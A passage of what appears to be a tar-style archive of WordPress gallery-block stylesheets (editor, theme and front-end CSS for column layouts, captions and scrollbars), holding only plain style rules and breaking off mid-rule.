.blocks-gallery-item{margin-left:0;width:100%}@media (min-width:600px){.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item{margin-left:1em;width:calc(33.33333% - .66667em)}.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item{margin-left:1em;width:calc(25% - .75em)}.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item{margin-left:1em;width:calc(20% - .8em)}.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item{margin-left:1em;width:calc(16.66667% - .83333em)}.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item{margin-left:1em;width:calc(14.28571% - .85714em)}.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item{margin-left:1em;width:calc(12.5% - .875em)}.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n){margin-left:0}}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:last-child,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:last-child{margin-left:0}.blocks-gallery-grid:not(.has-nested-images).alignleft,.blocks-gallery-grid:not(.has-nested-images).alignright,.wp-block-gallery:not(.has-nested-images).alignleft,.wp-block-gallery:not(.has-nested-images).alignright{max-width:420px;width:100%}.blocks-gallery-grid:not(.has-nested-images).aligncenter .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images).aligncenter .blocks-gallery-item figure{justify-content:center}.wp-block-gallery:not(.is-cropped) .blocks-gallery-item{align-self:flex-start}figure.wp-block-gallery.has-nested-images{align-items:normal}.wp-block-gallery.has-nested-images figure.wp-block-image:not(#individual-image){margin:0;width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)/2)}.wp-block-gallery.has-nested-images figure.wp-block-image{box-sizing:border-box;display:flex;flex-direction:column;flex-grow:1;justify-content:center;max-width:100%;position:relative}.wp-block-gallery.has-nested-images figure.wp-block-image>a,.wp-block-gallery.has-nested-images figure.wp-block-image>div{flex-direction:column;flex-grow:1;margin:0}.wp-block-gallery.has-nested-images figure.wp-block-image img{display:block;height:auto;max-width:100%!important;width:auto}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{background:linear-gradient(0deg,#000000b3,#0000004d 70%,#0000);bottom:0;box-sizing:border-box;color:#fff;font-size:13px;margin-bottom:0;max-height:60%;overflow:auto;padding:0 8px 8px;position:absolute;right:0;scrollbar-color:#0000 #0000;scrollbar-gutter:stable both-edges;scrollbar-width:thin;text-align:center;width:100%;will-change:transform}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar{height:12px;width:12px}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-track{background-color:initial}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:initial;border:3px solid #0000;border-radius:8px}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover::-webkit-scrollbar-thumb{background-color:#fffc}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover{scrollbar-color:#fffc #0000}@media (hover:none){.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{scrollbar-color:#fffc #0000}}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption img{display:inline}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption a{color:inherit}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border img{box-sizing:border-box}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>a,.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>div,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>a,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>div{flex:1 1 auto}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded figcaption{background:none;color:inherit;flex:initial;margin:0;padding:10px 10px 9px;position:relative}.wp-block-gallery.has-nested-images figcaption{flex-basis:100%;flex-grow:1;text-align:center}.wp-block-gallery.has-nested-images:not(.is-cropped) figure.wp-block-image:not(#individual-image){margin-bottom:auto;margin-top:0}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image){align-self:inherit}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>div:not(.components-drop-zone){display:flex}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) img{flex:1 0 0%;height:100%;object-fit:cover;width:100%}.wp-block-gallery.has-nested-images.columns-1 figure.wp-block-image:not(#individual-image){width:100%}@media (min-width:600px){.wp-block-gallery.has-nested-images.columns-3 figure.wp-block-image:not(#individual-image){width:calc(33.33333% - var(--wp--style--unstable-gallery-gap, 16px)*.66667)}.wp-block-gallery.has-nested-images.columns-4 figure.wp-block-image:not(#individual-image){width:calc(25% - var(--wp--style--unstable-gallery-gap, 16px)*.75)}.wp-block-gallery.has-nested-images.columns-5 figure.wp-block-image:not(#individual-image){width:calc(20% - var(--wp--style--unstable-gallery-gap, 16px)*.8)}.wp-block-gallery.has-nested-images.columns-6 figure.wp-block-image:not(#individual-image){width:calc(16.66667% - var(--wp--style--unstable-gallery-gap, 16px)*.83333)}.wp-block-gallery.has-nested-images.columns-7 figure.wp-block-image:not(#individual-image){width:calc(14.28571% - var(--wp--style--unstable-gallery-gap, 16px)*.85714)}.wp-block-gallery.has-nested-images.columns-8 figure.wp-block-image:not(#individual-image){width:calc(12.5% - var(--wp--style--unstable-gallery-gap, 16px)*.875)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image){width:calc(33.33% - var(--wp--style--unstable-gallery-gap, 16px)*.66667)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2),.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2)~figure.wp-block-image:not(#individual-image){width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)*.5)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:last-child{width:100%}}.wp-block-gallery.has-nested-images.alignleft,.wp-block-gallery.has-nested-images.alignright{max-width:420px;width:100%}.wp-block-gallery.has-nested-images.aligncenter{justify-content:center}gallery/editor.css000060400000007343151330427370010213 0ustar00:root :where(figure.wp-block-gallery){
  display:block;
}
:root :where(figure.wp-block-gallery)>.blocks-gallery-caption{
  flex:0 0 100%;
}
:root :where(figure.wp-block-gallery)>.blocks-gallery-media-placeholder-wrapper{
  flex-basis:100%;
}
:root :where(figure.wp-block-gallery) .wp-block-image .components-notice.is-error{
  display:block;
}
:root :where(figure.wp-block-gallery) .wp-block-image .components-notice__content{
  margin:4px 0;
}
:root :where(figure.wp-block-gallery) .wp-block-image .components-notice__dismiss{
  position:absolute;
  right:5px;
  top:0;
}
:root :where(figure.wp-block-gallery) .block-editor-media-placeholder.is-appender .components-placeholder__label{
  display:none;
}
:root :where(figure.wp-block-gallery) .block-editor-media-placeholder.is-appender .block-editor-media-placeholder__button{
  margin-bottom:0;
}
:root :where(figure.wp-block-gallery) .block-editor-media-placeholder{
  margin:0;
}
:root :where(figure.wp-block-gallery) .block-editor-media-placeholder .components-placeholder__label{
  display:flex;
}
:root :where(figure.wp-block-gallery) .block-editor-media-placeholder figcaption{
  z-index:2;
}
:root :where(figure.wp-block-gallery) .components-spinner{
  left:50%;
  margin-left:-9px;
  margin-top:-9px;
  position:absolute;
  top:50%;
}
.gallery-settings-buttons .components-button:first-child{
  margin-right:8px;
}

.gallery-image-sizes .components-base-control__label{
  display:block;
  margin-bottom:4px;
}
.gallery-image-sizes .gallery-image-sizes__loading{
  align-items:center;
  color:#757575;
  display:flex;
  font-size:12px;
}
.gallery-image-sizes .components-spinner{
  margin:0 8px 0 4px;
}
.blocks-gallery-item figure:not(.is-selected):focus,.blocks-gallery-item img:focus{
  outline:none;
}
.blocks-gallery-item figure.is-selected:before{
  bottom:0;
  box-shadow:0 0 0 1px #fff inset, 0 0 0 3px var(--wp-admin-theme-color) inset;
  content:"";
  left:0;
  outline:2px solid #0000;
  pointer-events:none;
  position:absolute;
  right:0;
  top:0;
  z-index:1;
}
.blocks-gallery-item figure.is-transient img{
  opacity:.3;
}
.blocks-gallery-item .is-selected .block-library-gallery-item__inline-menu{
  display:inline-flex;
}
.blocks-gallery-item .block-editor-media-placeholder{
  height:100%;
  margin:0;
}
.blocks-gallery-item .block-editor-media-placeholder .components-placeholder__label{
  display:flex;
}

.block-library-gallery-item__inline-menu{
  background:#fff;
  border:1px solid #1e1e1e;
  border-radius:2px;
  display:none;
  margin:8px;
  position:absolute;
  top:-2px;
  transition:box-shadow .2s ease-out;
  z-index:20;
}
@media (prefers-reduced-motion:reduce){
  .block-library-gallery-item__inline-menu{
    transition-delay:0s;
    transition-duration:0s;
  }
}
.block-library-gallery-item__inline-menu:hover{
  box-shadow:0 .7px 1px #0000001a,0 1.2px 1.7px -.2px #0000001a,0 2.3px 3.3px -.5px #0000001a;
}
@media (min-width:600px){
  .columns-7 .block-library-gallery-item__inline-menu,.columns-8 .block-library-gallery-item__inline-menu{
    padding:2px;
  }
}
.block-library-gallery-item__inline-menu .components-button.has-icon:not(:focus){
  border:none;
  box-shadow:none;
}
@media (min-width:600px){
  .columns-7 .block-library-gallery-item__inline-menu .components-button.has-icon,.columns-8 .block-library-gallery-item__inline-menu .components-button.has-icon{
    height:inherit;
    padding:0;
    width:inherit;
  }
}
.block-library-gallery-item__inline-menu.is-left{
  left:-2px;
}
.block-library-gallery-item__inline-menu.is-right{
  right:-2px;
}

.wp-block-gallery ul.blocks-gallery-grid{
  margin:0;
  padding:0;
}

@media (min-width:600px){
  .wp-block-update-gallery-modal{
    max-width:480px;
  }
}

.wp-block-update-gallery-modal-buttons{
  display:flex;
  gap:12px;
  justify-content:flex-end;
}gallery/theme.css000060400000000214151330427370010015 0ustar00.blocks-gallery-caption{
  color:#555;
  font-size:13px;
  text-align:center;
}
.is-dark-theme .blocks-gallery-caption{
  color:#ffffffa6;
}gallery/style.css000060400000037220151330427370010062 0ustar00.blocks-gallery-grid:not(.has-nested-images),.wp-block-gallery:not(.has-nested-images){
  display:flex;
  flex-wrap:wrap;
  list-style-type:none;
  margin:0;
  padding:0;
}
.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item{
  display:flex;
  flex-direction:column;
  flex-grow:1;
  justify-content:center;
  margin:0 1em 1em 0;
  position:relative;
  width:calc(50% - 1em);
}
.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n){
  margin-right:0;
}
.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figure,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figure{
  align-items:flex-end;
  display:flex;
  height:100%;
  justify-content:flex-start;
  margin:0;
}
.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item img{
  display:block;
  height:auto;
  max-width:100%;
  width:auto;
}
.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption{
  background:linear-gradient(0deg, #000000b3, #0000004d 70%, #0000);
  bottom:0;
  box-sizing:border-box;
  color:#fff;
  font-size:.8em;
  margin:0;
  max-height:100%;
  overflow:auto;
  padding:3em .77em .7em;
  position:absolute;
  text-align:center;
  width:100%;
  z-index:2;
}
.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption img{
  display:inline;
}
.blocks-gallery-grid:not(.has-nested-images) figcaption,.wp-block-gallery:not(.has-nested-images) figcaption{
  flex-grow:1;
}
.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item img{
  flex:1;
  height:100%;
  object-fit:cover;
  width:100%;
}
.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item{
  margin-right:0;
  width:100%;
}
@media (min-width:600px){
  .blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item{
    margin-right:1em;
    width:calc(33.33333% - .66667em);
  }
  .blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item{
    margin-right:1em;
    width:calc(25% - .75em);
  }
  .blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item{
    margin-right:1em;
    width:calc(20% - .8em);
  }
  .blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item{
    margin-right:1em;
    width:calc(16.66667% - .83333em);
  }
  .blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item{
    margin-right:1em;
    width:calc(14.28571% - .85714em);
  }
  .blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item{
    margin-right:1em;
    width:calc(12.5% - .875em);
  }
  .blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n){
    margin-right:0;
  }
}
.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:last-child,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:last-child{
  margin-right:0;
}
.blocks-gallery-grid:not(.has-nested-images).alignleft,.blocks-gallery-grid:not(.has-nested-images).alignright,.wp-block-gallery:not(.has-nested-images).alignleft,.wp-block-gallery:not(.has-nested-images).alignright{
  max-width:420px;
  width:100%;
}
.blocks-gallery-grid:not(.has-nested-images).aligncenter .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images).aligncenter .blocks-gallery-item figure{
  justify-content:center;
}

.wp-block-gallery:not(.is-cropped) .blocks-gallery-item{
  align-self:flex-start;
}

figure.wp-block-gallery.has-nested-images{
  align-items:normal;
}

.wp-block-gallery.has-nested-images figure.wp-block-image:not(#individual-image){
  margin:0;
  width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)/2);
}
.wp-block-gallery.has-nested-images figure.wp-block-image{
  box-sizing:border-box;
  display:flex;
  flex-direction:column;
  flex-grow:1;
  justify-content:center;
  max-width:100%;
  position:relative;
}
.wp-block-gallery.has-nested-images figure.wp-block-image>a,.wp-block-gallery.has-nested-images figure.wp-block-image>div{
  flex-direction:column;
  flex-grow:1;
  margin:0;
}
.wp-block-gallery.has-nested-images figure.wp-block-image img{
  display:block;
  height:auto;
  max-width:100% !important;
  width:auto;
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{
  background:linear-gradient(0deg, #000000b3, #0000004d 70%, #0000);
  bottom:0;
  box-sizing:border-box;
  color:#fff;
  font-size:13px;
  left:0;
  margin-bottom:0;
  max-height:60%;
  overflow:auto;
  padding:0 8px 8px;
  position:absolute;
  scrollbar-color:#0000 #0000;
  scrollbar-gutter:stable both-edges;
  scrollbar-width:thin;
  text-align:center;
  width:100%;
  will-change:transform;
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar{
  height:12px;
  width:12px;
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-track{
  background-color:initial;
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-thumb{
  background-clip:padding-box;
  background-color:initial;
  border:3px solid #0000;
  border-radius:8px;
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover::-webkit-scrollbar-thumb{
  background-color:#fffc;
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover{
  scrollbar-color:#fffc #0000;
}
@media (hover:none){
  .wp-block-gallery.has-nested-images figure.wp-block-image figcaption{
    scrollbar-color:#fffc #0000;
  }
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption img{
  display:inline;
}
.wp-block-gallery.has-nested-images figure.wp-block-image figcaption a{
  color:inherit;
}
.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border img{
  box-sizing:border-box;
}
.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>a,.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>div,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>a,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>div{
  flex:1 1 auto;
}
.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded figcaption{
  background:none;
  color:inherit;
  flex:initial;
  margin:0;
  padding:10px 10px 9px;
  position:relative;
}
.wp-block-gallery.has-nested-images figcaption{
  flex-basis:100%;
  flex-grow:1;
  text-align:center;
}
.wp-block-gallery.has-nested-images:not(.is-cropped) figure.wp-block-image:not(#individual-image){
  margin-bottom:auto;
  margin-top:0;
}
.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image){
  align-self:inherit;
}
.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>div:not(.components-drop-zone){
  display:flex;
}
.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) img{
  flex:1 0 0%;
  height:100%;
  object-fit:cover;
  width:100%;
}
.wp-block-gallery.has-nested-images.columns-1 figure.wp-block-image:not(#individual-image){
  width:100%;
}
@media (min-width:600px){
  .wp-block-gallery.has-nested-images.columns-3 figure.wp-block-image:not(#individual-image){
    width:calc(33.33333% - var(--wp--style--unstable-gallery-gap, 16px)*.66667);
  }
  .wp-block-gallery.has-nested-images.columns-4 figure.wp-block-image:not(#individual-image){
    width:calc(25% - var(--wp--style--unstable-gallery-gap, 16px)*.75);
  }
  .wp-block-gallery.has-nested-images.columns-5 figure.wp-block-image:not(#individual-image){
    width:calc(20% - var(--wp--style--unstable-gallery-gap, 16px)*.8);
  }
  .wp-block-gallery.has-nested-images.columns-6 figure.wp-block-image:not(#individual-image){
    width:calc(16.66667% - var(--wp--style--unstable-gallery-gap, 16px)*.83333);
  }
  .wp-block-gallery.has-nested-images.columns-7 figure.wp-block-image:not(#individual-image){
    width:calc(14.28571% - var(--wp--style--unstable-gallery-gap, 16px)*.85714);
  }
  .wp-block-gallery.has-nested-images.columns-8 figure.wp-block-image:not(#individual-image){
    width:calc(12.5% - var(--wp--style--unstable-gallery-gap, 16px)*.875);
  }
  .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image){
